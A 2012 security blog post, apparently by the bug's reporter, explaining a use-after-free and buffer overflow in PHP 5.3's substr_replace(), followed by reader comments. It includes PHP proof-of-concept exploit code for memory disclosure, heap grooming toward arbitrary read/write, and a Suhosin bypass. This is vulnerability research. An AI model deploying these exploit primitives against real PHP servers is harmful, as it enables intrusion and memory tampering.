Saturday, January 21, 2012

Interruption in PHP substr_replace()

I reported this bug a few months ago (#55871). You can see simple PoC in test script in bug page. It has been fixed only in 5.4 branch. The main use of this bug is for post exploitation as discussed in Stefan Esser’s slide and paper. For anyone who does not know about internal PHP structures, please read them from the Stefan Esser's paper or slide first because I will not cover them here.

Affect Version: 5.3.x

First, I will explain as I did in test script. The code for substr_replace() is long. Here is the link to the vulnerable code string.c. Below I show only related part.

    // ...
    // if a parameter is an array, no conversion at the beginning of function
    // ...
    if (Z_TYPE_PP(str) != IS_ARRAY) {
        // ...
    } else { /* str is array of strings */
        // ...
        while (zend_hash_get_current_data_ex(Z_ARRVAL_PP(str), (void **) &tmp_str, &pos_str) == SUCCESS) {
            zval *orig_str;
            zval dummy;
            if(Z_TYPE_PP(tmp_str) != IS_STRING) {
                dummy = **tmp_str;
                orig_str = &dummy;
            } else {
                orig_str = *tmp_str; // [1]

            // get and check 'from' value to 'f' (convert_to_long if needed)
            // get and check 'len' value to 'l' (convert_to_long if needed)
            // ...
            if ((f + l) > Z_STRLEN_P(orig_str)) {
                l = Z_STRLEN_P(orig_str) - f;  // [2]

            result_len = Z_STRLEN_P(orig_str) - l;

            if (Z_TYPE_PP(repl) == IS_ARRAY) {
                if (SUCCESS == zend_hash_get_current_data_ex(Z_ARRVAL_PP(repl), (void **) &tmp_repl, &pos_repl)) {
                    zval *repl_str;
                    zval zrepl;
                    if(Z_TYPE_PP(tmp_repl) != IS_STRING) {
                        zrepl = **tmp_repl;
                        repl_str = &zrepl;
                        convert_to_string(repl_str);  // [3] interruption
                    } else {
                        repl_str = *tmp_repl;

                    result_len += Z_STRLEN_P(repl_str);
                    zend_hash_move_forward_ex(Z_ARRVAL_PP(repl), &pos_repl);    
                    result = emalloc(result_len + 1);

                    memcpy(result, Z_STRVAL_P(orig_str), f);
                    memcpy((result + f), Z_STRVAL_P(repl_str), Z_STRLEN_P(repl_str));
                    memcpy((result + f + Z_STRLEN_P(repl_str)), Z_STRVAL_P(orig_str) + f + l, Z_STRLEN_P(orig_str) - f - l); // [4]
                    if(Z_TYPE_PP(tmp_repl) != IS_STRING) {
                } else {
                    // ...
            } else {
                // ...

            result[result_len] = '\0';
            add_next_index_stringl(return_value, result, result_len, 0);
            if(Z_TYPE_PP(tmp_str) != IS_STRING) {
                zval_dtor(orig_str);  // [5]
            zend_hash_move_forward_ex(Z_ARRVAL_PP(str), &pos_str);
        } /* while */
    } /* if */

At [1], if 'tmp_str' is string, the 'tmp_str' and 'orig_str' points to the same zval. After this point, the program assumes the 'orig_str' type is string.

At [3], if 'repl_str' is object, the convert_to_string() will call __toString() magic method. So if we pass the 'str' by reference with call-time-pass-by-reference feature or reference in array (see below), we can access/modify 'orig_str' value inside __toString().

At [5], because of interruption at [3], we can trick the program to free memory that variable has reference to it (use-after-free). Now look at first PoC.

class dummy {
    public function __toString() {
        //$GLOBALS['my_var'] += 0x08048000; // dump memory at 0x08048000
        //$GLOBALS['my_var'] .= 'AAAAAAAA'; // buffer overflow
        preg_match('//', '', $GLOBALS['my_var']); // dump HashTable data (and use-after-free in >=5.3.7)
        return '';
$my_var = str_repeat('A', 40);
$out = substr_replace(array(&$my_var), array(new dummy), 40, 0);

To dump memory at any address, just convert $my_var to integer (see why in zval struct). If we append string to $my_var, memcpy() at [4] will cause buffer overflow because length of 'orig_str' is modified after 'result_len' is computed.

The most interesting case is when $my_var is converted to array. We will get that HashTable struct. Also (for version >=5.3.7), the array (HashTable, Bucket, array of pointer to Bucket) is freed. So after calling substr_replace(), we just need to allocate manipulated string on deleted HashTable, Buckets and array of pointer to Bucket. Then, create the fake zval with length 0x7fffffff. Finally, we can read/write to any memory address.

To make exploit reliable for use-after-free (with my method), we need to understand Zend Memory Management Cache a little. The code is in Zend/zend_alloc.c. The important functions are _zend_mm_alloc_int() and _zend_mm_free_int(), only code related small size block. Here is the brief.

  1. When the efree() is called, the memory is not freed. But it is moved to free list cache.
  2. There are array of singly linked list to keep freed memory block. Each linked list keeps the same memory block size.
  3. When memory block is freed, it is moved to the head of linked list.
  4. When memory block is allocated, it is gotten from the head of linked list if linked list is not empty.

The plan is trying allocate string size same as HashTable, Bucket, arBuckets until they are allocated on freed array. Then use address from substr_replace() output to recover everything. Here is the code for 32 bit without suhosin patch.

class dummyht {
    public function __toString() {
        preg_match('//', '', $GLOBALS['my_var']);
        return "";

// hashtable and bucket size is 40
// arBuckets size is 32
$b = "ararararararararararararararar";
$fake_ht = "\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".str_repeat("\x00", 23);
$fake_bk = str_repeat("\x00", 38);
$fake_arb = "ararararararararararararar";
$junk = array(0=>'0',1=>'1',2=>'2',3=>'3',4=>'4',5=>'5',6=>'6',7=>'7');
$str_arr = array('ht'=>"\x08", 'arBks'=>"\x00", 'bk0'=>"\x00");
$my_var = str_repeat("A", 80);
$data = 0;
$data = substr_replace(array(&$my_var), array(new dummyht), 80, 0);
$junk[0] .= $h;
$junk[1] .= $h;
$junk[2] .= $h;
$junk[3] .= $h;
$junk[4] .= $h;
$str_arr['ht'] .= $fake_ht;
$str_arr['bk0'] .= $fake_bk;
$junk[5] .= $b;
$junk[6] .= $b;
$junk[7] .= $b;
$str_arr['arBks'] .= $fake_arb;
$ht = parse_hashtable($data[0]);
// repair hashtable
for ($i = 16; $i < 32; $i++) $str_arr['ht'][$i] = $data[0][$i];
for ($i = 36; $i < 39; $i++) $str_arr['ht'][$i] = $data[0][$i];
// repair arBuckets
for ($i = 0; $i < 4; $i++) $str_arr['arBks'][$i] = $data[0][$i+4*4];
for ($i = 4; $i < 4*7; $i++) $str_arr['arBks'][$i] = "\x00";

// create $fake_zval string in tail of arBuckets
$fake_zval  = pack("I", $ht['arBuckets'] & 0x80000000);
$fake_zval .= pack("I", 0x7fffffff);
$fake_zval .= pack("I", 1);
$fake_zval .= "\x06\x00";

for ($i = 0; $i < strlen($fake_zval); $i++)
    $str_arr['arBks'][$i+4*4] = $fake_zval[$i];

// repair first bucket
$sptr = pack("I", $ht['pListHead'] + 4*3);
for ($i = 0; $i < 4; $i++) $str_arr['bk0'][$i + 4*2] = $sptr[$i];
$sptr = pack("I", $ht['arBuckets'] + 4*4);
for ($i = 0; $i < 4; $i++) $str_arr['bk0'][$i + 4*3] = $sptr[$i];

$mem = &$my_var[0];

With Suhosin patch, the above method to dump memory and dump HashTable does not work. Because the patch always set str.len value to 0 when clearing the string variable. At [4], the copy length will be negative but it will cast to unsigned for memcpy(). The workaround for this problem is use [2]. I pass parameter len as object to cause the interruption before [2]. After convert_to_long(), the 'len' and Z_STRLEN_P(orig_str) are 0. At [2], 'l' will be 0. Fix the problem :]. Here is the PoC.

class dummy {}
function errhandler() {
    $GLOBALS['my_var'] = ''; // to make it work when no suhosin patch
    preg_match('//', '', $GLOBALS['my_var']);
    return true;
$my_var = str_repeat('A', 40);
$oldhandler = set_error_handler("errhandler");
$out = substr_replace(array(&$my_var), '', 40, array(new dummy));


  1. really good article!
    Subscribed to this blog!

  2. can you show the parse_hashtable function?
    Also i don't undestand smth.
    if $h is a string to be allocated on a freed hashtable and $b a string to be allocated on a freed arbuckets what are these vars for?

    $fake_ht = "\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".str_repeat("\x00", 23);
    $fake_bk = str_repeat("\x00", 38);
    $fake_arb = "ararararararararararararar";


  3. parse_hashtable() is just a function to parse the memory dump (string) to HashTable.
    $h is just a string that length is same as HashTable and Bucket size.

    I recommend to read Esser's paper or slide first. The last, debugger is your friend. Use it. You will get all answer from debugger.

  4. I've read esser's paper.
    I've understood 90% of it, but i haven't coded in C for years, and i don't even know how I could debug this easily, 'cause i'm not very familiar with the tools....

    Any hints on how I could debug this easily?
    Any help is appreciated! thanks!

  5. does this 3 lines seem ok to you? What's the point in separating a zval if it's a reference?

    2233 if (Z_ISREF_PP(str)) {
    2234 SEPARATE_ZVAL(str);
    2235 }

  6. It’s hard to come by experienced people about this subject, but you seem like you know what you’re talking about! Thanks.
    Java Training in Bangalore